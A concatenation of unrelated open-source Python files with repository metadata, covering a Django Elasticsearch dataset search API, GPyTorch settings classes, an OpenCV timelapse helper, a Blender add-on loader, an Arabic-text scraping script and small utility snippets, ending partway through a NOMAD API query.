sort_mapping = {\"average_rating\": {\"order\": sort_order}}\n elif sort_by == \"provider\":\n sort_mapping = {\"org_title.keyword\": {\"order\": sort_order}}\n elif sort_by == \"recent\":\n sort_mapping = {\"last_updated\": {\"order\": \"desc\"}}\n elif sort_by == \"relevance\":\n sort_mapping = {}\n # elif sort_by == \"downloads\":\n # sort_mapping = {\"download_count\": {\"order\": \"desc\"}}\n else:\n sort_mapping = {\"dataset_title.keyword\": {\"order\": sort_order}}\n else:\n sort_mapping = {}\n\n # Creating query for faceted search (filters).\n for value in facet:\n if value == \"sector\" and request.GET.get(value):\n filters.append(\n {\n \"match\": {\n f\"{value}\": {\n \"query\": request.GET.get(value).replace(\"||\", \" \"),\n \"operator\": \"AND\",\n }\n }\n }\n )\n selected_facets.append({f\"{value}\": request.GET.get(value).split(\"||\")})\n else:\n if request.GET.get(value):\n filters.append(\n {\"match\": {f\"{value}\": request.GET.get(value).replace(\"||\", \" \")}}\n )\n selected_facets.append({f\"{value}\": request.GET.get(value).split(\"||\")})\n\n # if dam_type:\n # filters.append(\n # {\"match\": {\"dataset_access_models.type\": dam_type.replace(\"||\", \" \")}}\n # )\n # selected_facets.append({\"type\": dam_type.split(\"||\")})\n # if payment_type:\n # filters.append(\n # {\n # \"match\": {\n # \"dataset_access_models.payment_type\": payment_type.replace(\n # \"||\", \" \"\n # )\n # }\n # }\n # )\n # selected_facets.append({\"payment_type\": payment_type.split(\"||\")})\n\n if org:\n filters.append({\"terms\": {\"org_title.keyword\": org.split(\"||\")}})\n selected_facets.append({\"organization\": org.split(\"||\")})\n\n if start_duration and end_duration:\n filters.append(\n {\n \"bool\": {\n \"must_not\": [\n {\"range\": {\"period_to\": {\"lte\": start_duration}}},\n {\"range\": {\"period_from\": {\"gte\": end_duration}}},\n ]\n }\n }\n )\n selected_facets.append({\"start_duration\": start_duration})\n selected_facets.append({\"end_duration\": end_duration})\n\n # Query for aggregations (facets).\n agg = {\n # \"license\": {\n # \"global\": {},\n # \"aggs\": {\"all\": {\"terms\": {\"field\": \"license.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n # },\n # \"license\": {\"terms\": {\"field\": \"license.keyword\", \"size\": 10000}},\n \"geography\": {\n \"global\": {},\n \"aggs\": {\"all\": {\"terms\": {\"field\": \"geography.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n },\n # \"geography\": {\"terms\": {\"field\": \"geography.keyword\", \"size\": 10000}},\n \"sector\": {\n \"global\": {},\n \"aggs\": {\"all\": {\"terms\": {\"field\": \"sector.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n },\n # \"sector\": {\"terms\": {\"field\": \"sector.keyword\", \"size\": 10000}},\n \"format\": {\n \"global\": {},\n \"aggs\": {\"all\": {\"terms\": {\"field\": \"format.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n },\n # \"format\": {\"terms\": {\"field\": \"format.keyword\", \"size\": 10000}},\n # \"status\": {\n # \"global\": {},\n # \"aggs\": {\"all\": {\"terms\": {\"field\": \"status.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n # },\n # # \"status\": {\"terms\": {\"field\": \"status.keyword\", \"size\": 10000}},\n # \"rating\": {\n # \"global\": {},\n # \"aggs\": {\"all\": {\"terms\": {\"field\": \"rating.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n # },\n # \"rating\": {\"terms\": {\"field\": \"rating.keyword\", \"size\": 10000}},\n # \"org_types\": {\n 
# \"global\": {},\n # \"aggs\": {\"all\": {\"terms\": {\"field\": \"org_types.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n # },\n # \"org_types\": {\"terms\": {\"field\": \"org_types.keyword\", \"size\": 10000}},\n \"organization\": {\n \"global\": {},\n \"aggs\": {\"all\": {\"terms\": {\"field\": \"org_title.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n },\n \"duration\": {\n \"global\": {},\n \"aggs\": {\n \"min\": {\"min\": {\"field\": \"period_from\", \"format\": \"yyyy-MM-dd\"}},\n \"max\": {\"max\": {\"field\": \"period_to\", \"format\": \"yyyy-MM-dd\"}},\n },\n },\n # \"type\": {\n # \"global\": {},\n # \"aggs\": {\"all\": {\"terms\": {\"field\": \"dataset_access_models.type.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n # },\n # \"type\": {\n # \"terms\": {\"field\": \"dataset_access_models.type.keyword\", \"size\": 10000}\n # },\n # \"payment_type\": {\n # \"global\": {},\n # \"aggs\": {\"all\": {\"terms\": {\"field\": \"dataset_access_models.payment_type.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n # },\n # \"payment_type\": {\n # \"terms\": {\n # \"field\": \"dataset_access_models.payment_type.keyword\",\n # \"size\": 10000,\n # }\n # },\n }\n if not query_string:\n # For filter search\n query = {\"bool\": {\"must\": filters}}\n resp = es_client.search(\n index=\"dataset\",\n aggs=agg,\n query=query,\n size=size,\n from_=paginate_from,\n sort=sort_mapping,\n )\n else:\n # For faceted search with query string.\n filters.append(\n {\n \"bool\": {\n \"should\": [\n {\n \"match\": {\n \"dataset_title\": {\n \"query\": query_string,\n \"operator\": \"OR\",\n \"fuzziness\": \"AUTO\",\n \"boost\": \"2\",\n }\n }\n },\n {\"match\": {\"tags\": {\"query\": query_string, \"boost\": \"1\"}}},\n {\"match\": {\"geography\": {\"query\": query_string, \"boost\": \"1\"}}},\n {\n \"match\": {\n \"dataset_description\": {\n \"query\": query_string,\n \"boost\": \"0.5\",\n }\n }\n },\n ]\n }\n }\n )\n # filters.append({\"match_phrase_prefix\":{\"dataset_title\":{\"query\": query_string}}})\n query = {\"bool\": {\"must\": filters}}\n resp = es_client.search(\n index=\"dataset\",\n aggs=agg,\n query=query,\n size=size,\n from_=paginate_from,\n sort=sort_mapping,\n )\n resp[\"selected_facets\"] = selected_facets\n return JsonResponse(resp) # HttpResponse(json.dumps(resp))\n\n\ndef organization_search(request):\n query_string = request.GET.get(\"q\", None)\n size = request.GET.get(\"size\", 5)\n paginate_from = request.GET.get(\"from\", 0)\n sort_order: str = request.GET.get(\"sort\", None)\n\n if sort_order:\n if sort_order == \"last_modified\":\n sort_mapping = {\"remote_modified\": {\"order\": \"desc\"}}\n elif sort_order == \"trends\":\n sort_mapping = [{\"average_rating\": {\"order\": \"desc\"}}, {\"dataset_count\": {\"order\": \"desc\"}}]\n else:\n sort_mapping = {\"dataset_title.keyword\": {\"order\": sort_order}}\n else:\n sort_mapping = {}\n\n if query_string:\n filters = [\n {\n \"bool\": {\n \"should\": [\n {\n \"match\": {\n \"org_title\": {\n \"query\": query_string,\n \"operator\": \"OR\",\n \"fuzziness\": \"AUTO\",\n \"boost\": \"2\",\n }\n }\n },\n {\n \"match\": {\n \"org_description\": {\n \"query\": query_string,\n \"boost\": \"0.5\",\n }\n }\n },\n ],\n }\n }\n ]\n query = {\"bool\": {\"must\": filters}}\n # query = {\"match\": {\"org_title\": {\"query\": query_string, \"operator\": \"AND\"}}}\n else:\n query = {\"bool\": {\"must\": {\"range\": {\"dataset_count\": {\"gt\": 0}}}}}\n\n resp = 
es_client.search(\n index=\"organizations\",\n query=query,\n size=size,\n from_=paginate_from,\n sort=sort_mapping,\n )\n return HttpResponse(json.dumps(resp[\"hits\"]))\n\n\ndef more_like_this(request):\n id = request.GET.get(\"q\", None)\n if id:\n query = {\n \"more_like_this\": {\n \"like\": [{\"_index\": \"dataset\", \"_id\": id}],\n \"min_term_freq\": 0,\n \"max_query_terms\": 10,\n \"min_doc_freq\": 0,\n }\n }\n resp = es_client.search(index=\"dataset\", query=query)\n return HttpResponse(json.dumps(resp[\"hits\"]))\n\n\ndef org_user_count(organization):\n user_count = (\n DatasetAccessModelRequest.objects.filter(\n Q(access_model_id__dataset_id__catalog__organization=organization.id),\n Q(access_model_id__dataset__status__exact=\"PUBLISHED\"),\n )\n .values_list(\"user\")\n .distinct()\n .count()\n )\n return user_count\n\n\ndef org_dataset_count(organization):\n dataset = Dataset.objects.filter(\n Q(status__exact=\"PUBLISHED\"),\n Q(catalog__organization=organization.id),\n ).count()\n return dataset\n\n\ndef org_average_rating(organization):\n pub_datasets = Dataset.objects.filter(\n Q(status__exact=\"PUBLISHED\"),\n Q(catalog__organization=organization.id),\n )\n count = 0\n rating = 0\n for dataset in pub_datasets:\n dataset_rating = get_average_rating(dataset)\n if dataset_rating > 0:\n count = count + 1\n rating = rating + dataset_rating\n return rating / count if rating else 0\n\n\ndef reindex_organizations():\n obj = OrganizationCreateRequest.objects.all()\n for org_obj in obj:\n update_organization_index(org_obj)\n\n\ndef update_organization_index(org_obj):\n if org_obj.status == \"APPROVED\":\n doc = {\n \"id\": org_obj.id,\n \"org_title\": org_obj.title,\n \"org_description\": org_obj.description,\n \"homepage\": org_obj.homepage,\n \"contact\": org_obj.contact_email,\n \"type\": org_obj.organization_types,\n \"dpa_name\": org_obj.dpa_name,\n \"dpa_email\": org_obj.dpa_email,\n \"dpa_designation\": org_obj.dpa_designation,\n \"state\": org_obj.state.name if org_obj.state else \"\",\n \"parent\": org_obj.parent.id if org_obj.parent else \"\",\n \"dpa_phone\": org_obj.dpa_phone,\n \"dpa_tid\": org_obj.ogd_tid,\n \"sub_type\": org_obj.organization_subtypes,\n \"address\": org_obj.address,\n \"status\": org_obj.status,\n \"issued\": org_obj.issued,\n \"modified\": org_obj.modified,\n \"logo\": org_obj.logo.name,\n \"dataset_count\": org_dataset_count(org_obj),\n \"user_count\": org_user_count(org_obj),\n \"average_rating\": org_average_rating(org_obj),\n }\n # Check if Org already exists.\n resp = es_client.exists(index=\"organizations\", id=org_obj.id)\n if resp:\n # Delete the Org.\n resp = es_client.delete(index=\"organizations\", id=org_obj.id)\n # # print(resp[\"result\"])\n # Index the Organization.\n resp = es_client.index(index=\"organizations\", id=org_obj.id, document=doc)\n print(resp[\"result\"], org_obj.id)\n # return resp[\"result\"]\n\n\ndef reindex_data():\n dataset_obj = Dataset.objects.filter(status=\"PUBLISHED\")\n for datasets in dataset_obj:\n resp = index_data(datasets)\n if resp == \"created\":\n print(\"Dataset_id --\", datasets.id)\n else:\n print(\"Re-indexing failed!\")\n","repo_name":"CivicDataLab/OPub_DataServer","sub_path":"dataset_api/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":20232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"32186878220","text":"#!/usr/bin/env python3\n\nimport torch\nfrom linear_operator.settings import (\n _linalg_dtype_cholesky,\n 
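# these names are re-exported from linear_operator (see __all__ at the bottom of this module)\n 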
_linalg_dtype_symeig,\n cg_tolerance,\n cholesky_jitter,\n cholesky_max_tries,\n ciq_samples,\n deterministic_probes,\n fast_computations,\n linalg_dtypes,\n max_cg_iterations,\n max_cholesky_size,\n max_lanczos_quadrature_iterations,\n max_preconditioner_size,\n max_root_decomposition_size,\n min_preconditioning_size,\n minres_tolerance,\n num_contour_quadrature,\n num_trace_samples,\n preconditioner_tolerance,\n skip_logdet_forward,\n terminate_cg_by_size,\n tridiagonal_jitter,\n use_toeplitz,\n verbose_linalg,\n)\nfrom torch import Tensor\n\n\nclass _dtype_value_context:\n _global_float_value = None\n _global_double_value = None\n _global_half_value = None\n\n @classmethod\n def value(cls, dtype):\n if torch.is_tensor(dtype):\n dtype = dtype.dtype\n if dtype == torch.float:\n return cls._global_float_value\n elif dtype == torch.double:\n return cls._global_double_value\n elif dtype == torch.half:\n return cls._global_half_value\n else:\n raise RuntimeError(f\"Unsupported dtype for {cls.__name__}.\")\n\n @classmethod\n def _set_value(cls, float_value, double_value, half_value):\n if float_value is not None:\n cls._global_float_value = float_value\n if double_value is not None:\n cls._global_double_value = double_value\n if half_value is not None:\n cls._global_half_value = half_value\n\n def __init__(self, float_value=None, double_value=None, half_value=None):\n self._orig_float_value = self.__class__.value(torch.float)\n self._instance_float_value = float_value if float_value is not None else self._orig_float_value\n self._orig_double_value = self.__class__.value(torch.double)\n self._instance_double_value = double_value if double_value is not None else self._orig_double_value\n self._orig_half_value = self.__class__.value(torch.half)\n self._instance_half_value = half_value if half_value is not None else self._orig_half_value\n\n def __enter__(\n self,\n ):\n self.__class__._set_value(\n self._instance_float_value,\n self._instance_double_value,\n self._instance_half_value,\n )\n\n def __exit__(self, *args):\n self.__class__._set_value(self._orig_float_value, self._orig_double_value, self._orig_half_value)\n return False\n\n\nclass _feature_flag:\n r\"\"\"Base class for feature flag settings with global scope.\n The default is set via the `_default` class attribute.\n \"\"\"\n\n _default = False\n _state = None\n\n @classmethod\n def is_default(cls):\n return cls._state is None\n\n @classmethod\n def on(cls):\n if cls.is_default():\n return cls._default\n return cls._state\n\n @classmethod\n def off(cls):\n return not cls.on()\n\n @classmethod\n def _set_state(cls, state):\n cls._state = state\n\n def __init__(self, state=True):\n self.prev = self.__class__._state\n self.state = state\n\n def __enter__(self):\n self.__class__._set_state(self.state)\n\n def __exit__(self, *args):\n self.__class__._set_state(self.prev)\n return False\n\n\nclass _value_context:\n _global_value = None\n\n @classmethod\n def value(cls):\n return cls._global_value\n\n @classmethod\n def _set_value(cls, value):\n cls._global_value = value\n\n def __init__(self, value):\n self._orig_value = self.__class__.value()\n self._instance_value = value\n\n def __enter__(\n self,\n ):\n self.__class__._set_value(self._instance_value)\n\n def __exit__(self, *args):\n self.__class__._set_value(self._orig_value)\n return False\n\n\nclass debug(_feature_flag):\n \"\"\"\n Whether or not to perform \"safety\" checks on the supplied data.\n (For example, that the correct training data is supplied in Exact GP training mode)\n 
Pros: fewer data checks, fewer warning messages\n Cons: possibility of supplying incorrect data, model accidentally in wrong mode\n\n (Default: True)\n \"\"\"\n\n _default = True\n\n\nclass detach_test_caches(_feature_flag):\n \"\"\"\n Whether or not to detach caches computed for making predictions. In most cases, you will want this,\n as this will speed up derivative computations of the predictions with respect to test inputs. However,\n if you also need derivatives with respect to training inputs (e.g., because you have fantasy observations),\n then you must disable this.\n\n (Default: True)\n \"\"\"\n\n _default = True\n\n\nclass eval_cg_tolerance(_value_context):\n \"\"\"\n Relative residual tolerance to use for terminating CG when making predictions.\n\n (Default: 1e-2)\n \"\"\"\n\n _global_value = 0.01\n\n\nclass fast_pred_var(_feature_flag):\n \"\"\"\n Fast predictive variances using Lanczos Variance Estimates (LOVE)\n Use this for improved performance when computing predictive variances.\n\n As described in the paper:\n\n `Constant-Time Predictive Distributions for Gaussian Processes`_.\n\n See also: :class:`gpytorch.settings.max_root_decomposition_size` (to control the\n size of the low rank decomposition used for variance estimates).\n\n (Default: False)\n\n .. _`Constant-Time Predictive Distributions for Gaussian Processes`:\n https://arxiv.org/pdf/1803.06058.pdf\n \"\"\"\n\n _num_probe_vectors = 1\n\n @classmethod\n def num_probe_vectors(cls):\n return cls._num_probe_vectors\n\n @classmethod\n def _set_num_probe_vectors(cls, value):\n cls._num_probe_vectors = value\n\n def __init__(self, state=True, num_probe_vectors=1):\n self.orig_value = self.__class__.num_probe_vectors()\n self.value = num_probe_vectors\n super().__init__(state)\n\n def __enter__(self):\n self.__class__._set_num_probe_vectors(self.value)\n super().__enter__()\n\n def __exit__(self, *args):\n self.__class__._set_num_probe_vectors(self.orig_value)\n return super().__exit__()\n\n\nclass fast_pred_samples(_feature_flag):\n \"\"\"\n Fast predictive samples using Lanczos Variance Estimates (LOVE).\n Use this for improved performance when sampling from a predictive posterior matrix.\n\n As described in the paper:\n\n `Constant-Time Predictive Distributions for Gaussian Processes`_.\n\n See also: :class:`gpytorch.settings.max_root_decomposition_size` (to control the\n size of the low rank decomposition used for samples).\n\n (Default: False)\n\n .. 
_`Constant-Time Predictive Distributions for Gaussian Processes`:\n https://arxiv.org/pdf/1803.06058.pdf\n \"\"\"\n\n _default = False\n\n\nclass lazily_evaluate_kernels(_feature_flag):\n \"\"\"\n Lazily compute the entries of covariance matrices (set to True by default).\n This can result in memory and speed savings - if say cross covariance terms are not needed\n or if you only need to compute variances (not covariances).\n\n If set to False, gpytorch will always compute the entire covariance matrix between\n training and test data.\n\n (Default: True)\n \"\"\"\n\n _default = True\n\n\nclass max_eager_kernel_size(_value_context):\n \"\"\"\n If the joint train/test covariance matrix is less than this size, then we will avoid as\n much lazy evaluation of the kernel as possible.\n\n (Default: 512)\n \"\"\"\n\n _global_value = 512\n\n\nclass memory_efficient(_feature_flag):\n \"\"\"\n Whether or not to use Toeplitz math with gridded data, grid inducing point modules\n Pros: memory efficient, faster on CPU\n Cons: slower on GPUs with < 10000 inducing points\n\n (Default: False)\n \"\"\"\n\n _default = False\n\n\nclass min_fixed_noise(_dtype_value_context):\n \"\"\"\n The minimum noise value that can be used in :obj:`~gpytorch.likelihoods.FixedNoiseGaussianLikelihood`.\n If the supplied noise values are smaller than this, they are rounded up and a warning is raised.\n\n - Default for `float`: 1e-4\n - Default for `double`: 1e-6\n - Default for `half`: 1e-3\n \"\"\"\n\n _global_float_value = 1e-4\n _global_double_value = 1e-6\n _global_half_value = 1e-3\n\n\nclass min_variance(_dtype_value_context):\n \"\"\"\n The minimum variance that can be returned from :obj:`~gpytorch.distributions.MultivariateNormal#variance`.\n If variances are smaller than this, they are rounded up and a warning is raised.\n\n - Default for `float`: 1e-6\n - Default for `double`: 1e-10\n - Default for `half`: 1e-3\n \"\"\"\n\n _global_float_value = 1e-6\n _global_double_value = 1e-10\n _global_half_value = 1e-3\n\n\nclass num_gauss_hermite_locs(_value_context):\n \"\"\"\n The number of samples to draw from a latent GP when computing a likelihood\n This is used in variational inference and training\n\n (Default: 20)\n \"\"\"\n\n _global_value = 20\n\n\nclass num_likelihood_samples(_value_context):\n \"\"\"\n The number of samples to draw from a latent GP when computing a likelihood\n This is used in variational inference and training\n\n (Default: 10)\n \"\"\"\n\n _global_value = 10\n\n\nclass prior_mode(_feature_flag):\n \"\"\"\n If set to true, GP models will be evaluated in prior mode.\n This allows evaluating any Exact GP model in prior mode, even if it has training data / targets.\n\n (Default: False)\n \"\"\"\n\n _default = False\n\n\nclass sgpr_diagonal_correction(_feature_flag):\n \"\"\"\n If set to true, during posterior prediction the variances of the InducingPointKernel\n will be corrected to match the variances of the exact kernel.\n\n If false then no such correction will be performed (this is the default in other libraries).\n\n (Default: True)\n \"\"\"\n\n _default = True\n\n\nclass skip_posterior_variances(_feature_flag):\n \"\"\"\n Whether or not to skip the posterior covariance matrix when doing an ExactGP\n forward pass. If this is on, the returned gpytorch MultivariateNormal will have a\n ZeroLinearOperator as its covariance matrix. 
This allows gpytorch to not compute\n the covariance matrix when it is not needed, speeding up computations.\n\n (Default: False)\n \"\"\"\n\n _default = False\n\n\nclass trace_mode(_feature_flag):\n \"\"\"\n If set to True, we will generally try to avoid calling our built in PyTorch functions, because these cannot\n be run through torch.jit.trace.\n\n Note that this will sometimes involve explicitly evaluating lazy tensors and various other slowdowns and\n inefficiencies. As a result, you really shouldn't use this feature context unless you are calling torch.jit.trace\n on a GPyTorch model.\n\n Our hope is that this flag will not be necessary long term, once https://github.com/pytorch/pytorch/issues/22329\n is fixed.\n\n (Default: False)\n \"\"\"\n\n _default = False\n\n\nclass variational_cholesky_jitter(_dtype_value_context):\n \"\"\"\n The jitter value used for Cholesky factorizations in variational models.\n\n - Default for `float`: 1e-4\n - Default for `double`: 1e-6\n \"\"\"\n\n _global_float_value = 1e-4\n _global_double_value = 1e-6\n\n @classmethod\n def value(cls, dtype=None):\n return super().value(dtype=dtype)\n\n\nclass observation_nan_policy(_value_context):\n \"\"\"\n NaN handling policy for observations.\n\n * ``ignore``: Do not check for NaN values (the default).\n * ``mask``: Mask out NaN values during calculation. If an output is NaN in a single batch element, this output\n is masked for the complete batch. This strategy likely is a good choice if you have NaN values.\n * ``fill``: Fill in NaN values with a dummy value, perform computations and filter them later.\n Not supported by :class:`gpytorch.mlls.ExactMarginalLogLikelihood`.\n Does not support lazy covariance matrices during prediction.\n \"\"\"\n\n _fill_value = -999.0\n _global_value = \"ignore\"\n\n def __init__(self, value):\n if value not in {\"ignore\", \"mask\", \"fill\"}:\n raise ValueError(f\"NaN handling policy {value} not supported!\")\n super().__init__(value)\n\n @staticmethod\n def _get_observed(observations, event_shape) -> Tensor:\n \"\"\"\n Constructs a tensor that masks out all elements in the event shape of the tensor which contain a NaN value in\n any batch element. Applying this index flattens the event_shape, as the task structure cannot be retained.\n This function is used if observation_nan_policy is set to 'mask'.\n\n :param Tensor observations: The observations to search for NaN values in.\n :param torch.Size event_shape: The shape of a single event, i.e. 
the shape of observations without batch\n dimensions.\n :return: The mask to the event dimensions of the observations.\n \"\"\"\n return ~torch.any(torch.isnan(observations.reshape(-1, *event_shape)), dim=0)\n\n @classmethod\n def _fill_tensor(cls, observations) -> Tensor:\n \"\"\"\n Fills a tensor's NaN values with a filling value.\n This function is used if observation_nan_policy is set to 'fill'.\n\n :param Tensor observations: The tensor to fill with values.\n :return: The filled in observations.\n \"\"\"\n return torch.nan_to_num(observations, nan=cls._fill_value)\n\n\nclass use_keops(_feature_flag):\n \"\"\"\n Whether or not to use KeOps under the hood (when using any :class:`gpytorch.kernels.keops.KeOpsKernel`.\n In general, this flag should be set to True.\n Setting it to false will resort to non-KeOps computation,\n which will be slower but may be useful for debugging or timing comparisons.\n\n (Default: True)\n \"\"\"\n\n _default = True\n\n\n__all__ = [\n \"_linalg_dtype_symeig\",\n \"_linalg_dtype_cholesky\",\n \"cg_tolerance\",\n \"cholesky_jitter\",\n \"cholesky_max_tries\",\n \"ciq_samples\",\n \"debug\",\n \"detach_test_caches\",\n \"deterministic_probes\",\n \"eval_cg_tolerance\",\n \"fast_computations\",\n \"fast_pred_var\",\n \"fast_pred_samples\",\n \"lazily_evaluate_kernels\",\n \"linalg_dtypes\",\n \"max_eager_kernel_size\",\n \"max_cholesky_size\",\n \"max_cg_iterations\",\n \"max_lanczos_quadrature_iterations\",\n \"max_preconditioner_size\",\n \"max_root_decomposition_size\",\n \"memory_efficient\",\n \"min_preconditioning_size\",\n \"min_variance\",\n \"minres_tolerance\",\n \"num_contour_quadrature\",\n \"num_gauss_hermite_locs\",\n \"num_likelihood_samples\",\n \"num_trace_samples\",\n \"observation_nan_policy\",\n \"preconditioner_tolerance\",\n \"prior_mode\",\n \"sgpr_diagonal_correction\",\n \"skip_logdet_forward\",\n \"skip_posterior_variances\",\n \"terminate_cg_by_size\",\n \"trace_mode\",\n \"tridiagonal_jitter\",\n \"use_keops\",\n \"use_toeplitz\",\n \"variational_cholesky_jitter\",\n \"verbose_linalg\",\n]\n","repo_name":"cornellius-gp/gpytorch","sub_path":"gpytorch/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":14799,"program_lang":"python","lang":"en","doc_type":"code","stars":3285,"dataset":"github-code","pt":"3"} +{"seq_id":"13511811468","text":"import os\nimport cv2 as cv\nimport numpy as np\n\n\nclass Timelapser:\n\n TIMELAPSE_CHOICES = ('no', 'as_is', 'crop',)\n DEFAULT_TIMELAPSE = 'no'\n\n def __init__(self, timelapse=DEFAULT_TIMELAPSE):\n self.do_timelapse = True\n self.timelapse_type = None\n self.timelapser = None\n\n if timelapse == \"as_is\":\n self.timelapse_type = cv.detail.Timelapser_AS_IS\n elif timelapse == \"crop\":\n self.timelapse_type = cv.detail.Timelapser_CROP\n else:\n self.do_timelapse = False\n\n if self.do_timelapse:\n self.timelapser = cv.detail.Timelapser_createDefault(\n self.timelapse_type\n )\n\n def initialize(self, *args):\n \"\"\"https://docs.opencv.org/4.x/dd/dac/classcv_1_1detail_1_1Timelapser.html#aaf0f7c4128009f02473332a0c41f6345\"\"\" # noqa\n self.timelapser.initialize(*args)\n\n def process_and_save_frame(self, img_name, img, corner):\n self.process_frame(img, corner)\n cv.imwrite(self.get_fixed_filename(img_name), self.get_frame())\n\n def process_frame(self, img, corner):\n mask = np.ones((img.shape[0], img.shape[1]), np.uint8)\n img = img.astype(np.int16)\n self.timelapser.process(img, mask, corner)\n\n def get_frame(self):\n frame = self.timelapser.getDst()\n frame = 
np.float32(cv.UMat.get(frame))\n frame = cv.convertScaleAbs(frame)\n return frame\n\n @staticmethod\n def get_fixed_filename(img_name):\n dirname, filename = os.path.split(img_name)\n return os.path.join(dirname, \"fixed_\" + filename)\n","repo_name":"alanross/AlvaAR","sub_path":"src/libs/opencv/apps/opencv_stitching_tool/opencv_stitching/timelapser.py","file_name":"timelapser.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"3"} +{"seq_id":"37615691051","text":"import bpy\nfrom . import SharMemIOClasses\n\nbl_info = {'name': \"SHAR Memory IO\",\n 'author': 'Weasel On A Stick',\n 'version': (1, 0, 0),\n 'blender': (2, 82, 7),\n 'location': 'View3D > Sidebar > SharMemIO',\n 'description': 'Read/write in-game player/car position for SHAR (REQUIRES PYMEM)',\n #'tracker_url': 'https://github.com/WeaselOnaStick/map-data-editor/issues',\n #'wiki_url': 'https://github.com/WeaselOnaStick/map-data-editor/wiki',\n 'category': 'User Interface'}\n\n\nclasses = SharMemIOClasses.to_register\n\n\ndef register():\n from bpy.utils import register_class\n for cls in classes:\n register_class(cls)\n \n bpy.types.Scene.SMIO = bpy.props.PointerProperty(\n type=(SharMemIOClasses.SMIOPropGroup),\n name=\"SHAR Memory IO\",\n )\n\n\ndef unregister():\n from bpy.utils import unregister_class\n for cls in classes:\n unregister_class(cls)\n del bpy.types.Scene.SMIO\n\n\nif __name__ == '__main__':\n register()\n","repo_name":"WeaselOnaStick/SharMemIO","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21695402096","text":"import sys\nimport getopt\nfrom pathlib import Path\nhome = str(Path.home())\nimport tempfile\n\neras = ['Jahiliy','SadrIslam','Umayyad','Abbasid','Dual','Modern']\nmapEraToArabic = {\n eras[0]: 'العصر الجاهلي',\n eras[1]: 'عصر صدر الإسلام',\n eras[2]: 'عصر بني أمية',\n eras[3]: 'عصر بني العباس',\n eras[4]: 'عصر الدول المتتابعة',\n eras[5]: 'العصر الحديث'\n}\neraStart = [460,610,661,750,1258,1798]\neraEnd = [610,661,750,1258,1798,2019]\npath = str(Path.home())+\"/rawData\" # where to put scraped files\nxmlDir = str(Path.home())+'/xmlCorpus' # where to put xml files\ndef createDirectories():\n import os\n for x in eras:\n if not os.path.isdir(path + '/' + x):\n os.makedirs(path + '/' + x) # line B\n print(x + ' created.')\n\nif __name__ == \"__main__\":\n import islamicbook_scrape\n import news_scrape\n import chi3r_scrape\n import shamela_scrape\n import cleaner\n import os\n\n createDirectories()\n light_scrape = False\n\n options, remainder = getopt.getopt(sys.argv[1:], 'l',[])\n for opt,arg in options:\n if opt == '-l':\n light_scrape = True\n\n\n print('starting to scrape')\n if light_scrape:\n print('light scraping mode selected')\n islamicbook_scrape.scrape_all(1)\n # news_scrape.scrape_all(1)\n chi3r_scrape.scrape_all(5)\n else:\n print('heavy scrape mode selected')\n islamicbook_scrape.scrape_all()\n news_scrape.scrape_all()\n chi3r_scrape.scrape_all()\n shamela_scrape.scrape_all()\n\n print('cleaning...')\n # cleaning\n cleaner.clean()\n\n print('converting to xml...')\n # convert to xml\n if not os.path.isdir(xmlDir):\n os.makedirs(xmlDir) # line B\n 
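# convert the cleaned scraped text files into XML documents stored under xmlDir\n    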
cleaner.convertScrapedToXml(xmlDir)","repo_name":"ressay/arabic_historical_corpus","sub_path":"initializer.py","file_name":"initializer.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"22765306484","text":"def getAvailableLetters(lettersGuessed):\n    '''\n    lettersGuessed: list, what letters have been guessed so far\n    returns: string, comprised of letters that represents what letters have not\n    yet been guessed.\n    '''\n    # FILL IN YOUR CODE HERE...\n    import string\n    characters = string.ascii_lowercase\n    return "".join([x for x in characters if x not in lettersGuessed])\n\n\nlettersGuessed = ['e', 'i', 'k', 'p', 'r', 's']\nprint(getAvailableLetters(lettersGuessed)) # >> abcdfghjlmnoqtuvwxyz","repo_name":"najuzilu/mit-6.00.1x","sub_path":"Week 3 - Structured Types/week3_problem3.py","file_name":"week3_problem3.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11725309762","text":"class Node:\n\tid_node_dict = {}\n\tcnt = 0\n\tdef __init__(self, id):\n\t\tself.id = id\n\t\tself.friends = set()\n\t\tself.used = False #flag used by graph traversals; it is reset back to False right after each traversal\n\t\tself.number = Node.cnt\n\t\tself.dict_upd()\n\t\tNode.cnt += 1\n\n\tdef dict_upd(self):\n\t\tNode.id_node_dict.update({self.id: self})\n\t\t\n\tdef set_node_coords(node, x, y):\n\t\tnode.coords[0] = x\n\t\tnode.coords[1] = y\n\t\tprint(node.coords)\n\n\t@staticmethod\n\tdef id_to_node(node_id):\n\t\tif node_id in Node.id_node_dict:\n\t\t\treturn Node.id_node_dict[node_id]\n\t\telse:\n\t\t\treturn Node(node_id)\n\t\n","repo_name":"zhitm/graph_vk","sub_path":"node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20022200573","text":"from bravado.client import SwaggerClient\nimport re\nnomad_url = 'http://nomad-lab.eu/prod/rae/api'\n# create the bravado client\nclient = SwaggerClient.from_url('%s/swagger.json' % nomad_url)\n# perform the search request to print number of public entries\ndata = client.repo.search(only_atoms=['Element_1', 